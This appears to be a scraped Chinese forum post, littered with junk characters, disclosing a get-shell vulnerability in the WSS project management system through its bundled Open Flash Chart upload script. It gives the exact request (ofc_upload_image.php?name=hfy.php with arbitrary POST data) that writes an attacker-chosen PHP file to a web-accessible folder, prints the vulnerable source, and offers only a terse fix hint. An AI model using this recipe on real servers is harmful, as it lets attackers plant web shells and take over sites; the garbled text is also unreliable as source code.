WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
, Q2 D- u& z; ]! Y! ]) d 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
$ v& x$ E# P, A* q! |4 Y# j
: K- v5 M4 Q4 V1 t# f( {) j利用：
8 S' z. C5 H  b/ ?+ {/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
+ A  z* `/ U0 ]% B$ n# y1 ?
& l7 E7 N% E7 {Post任意数据
# @1 C$ G9 H2 A* n$ t保存位置http://localhost/chart/tmp-upload-images/hfy.php


最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

( a9 e, a, l! q  W' v6 q* W9 U<?php

4 [5 [6 S8 a2 f' ~' h, _7 \//
# d: x% t" s2 D2 |" P6 n$ H// In Open Flash Chart -> save_image debug mode, you
+ U( e5 ], Z5 F& s# S3 t// will see the 'echo' text in a new window.
//
, L6 O0 i. d' x' R0 y5 G2 ~
2 T: p! C# g, {! P: D/*
% h& Z4 V: y# m: ]2 s1 L  @- p
print_r( $_GET );
! i6 Z( Z% q' n( L$ r8 iprint_r( $_POST );
print_r( $_FILES );

/ g' o: a; \1 Xprint_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
; J: W' D/ y0 `. F4 {: O+ T
2 d: u% ^* C6 i$ H*/
" R" G( T& g2 n// default path for the image to be stored //
# c0 b- C$ o& L8 `9 q0 W, G$default_path = '../tmp-upload-images/';

. j7 M$ t% a# ^( `% c- E$ Fif (!file_exists($default_path)) mkdir($default_path, 0777, true);
+ g$ k' e0 J" j& |
6 n& a8 V. l- V# u// full path to the saved image including filename //
  u  A+ L0 K7 v8 S' q& v6 N# p0 K$destination = $default_path . basename( $_GET[ 'name' ] );
1 K9 d! Z8 m% z) G1 l
# y4 ^# N% R4 z9 a3 B; q- Gecho 'Saving your image to: '. $destination;
1 F* G# x( a$ _. p' c0 m// print_r( $_POST );
6 h9 `9 f1 N: [" K, k// print_r( $_SERVER );
* W! Q( D* {7 ~' P& i" k. D// echo $HTTP_RAW_POST_DATA;
; U% q8 M% D0 y2 s! `
$ Y; |! \0 z  g) U//
7 o$ C8 v! D; x8 A// POST data is usually string data, but we are passing a RAW .png
3 H  |' f1 d9 U% j7 E' m" S7 g// so PHP is a bit confused and $_POST is empty. But it has saved
$ f3 q8 i) H* O0 w) a/ ~// the raw bits into $HTTP_RAW_POST_DATA
//
$ R$ c' R+ Z% Y( L. q6 t
$ o( A0 }& m/ D& I3 B2 z2 l  l& S$jfh = fopen($destination, 'w') or die("can't open file");
: g0 m" {2 V' I+ F% a9 a6 afwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

& N1 j. ^! y/ c5 C( Q7 s//
& L9 I" j2 J  g, ^3 r. z2 L// LOOK:
//
exit();
//
// PHP5:
- d# x# @' s( @9 ^//

& m' l: q* f. i; ?3 Y
// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
: V/ i* l1 U$ H. g" p. r
5 Q2 N2 C2 ^6 k0 d  Pif (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 j6 M4 J* b( \$ d! J% ~6 M
9 I! V8 g8 c: R3 S3 b% }// full path to the saved image including filename //
# C" y1 G' d. J  U) o$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
2 L& {4 @2 C! U* P, r! rif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
% ~/ C0 h; q+ O4 f' Z' o7 e9 L1 b    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
/ X  N( w3 H8 J. }. G5 e}
2 z* I. Q3 @; k9 {/ h
  f) Q1 }* v- ~: c5 G
% K- w9 U8 ]3 S  R! D3 r?>
- R; o" K5 ^9 ]; M6 ?



4 }7 k6 ^( K$ H- g* f2 J! U9 v
$ }" n; Y4 k$ v+ u
" \  n& `$ I' ^+ R修复方案：
这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞


& D& O" x* E0 H5 U+ i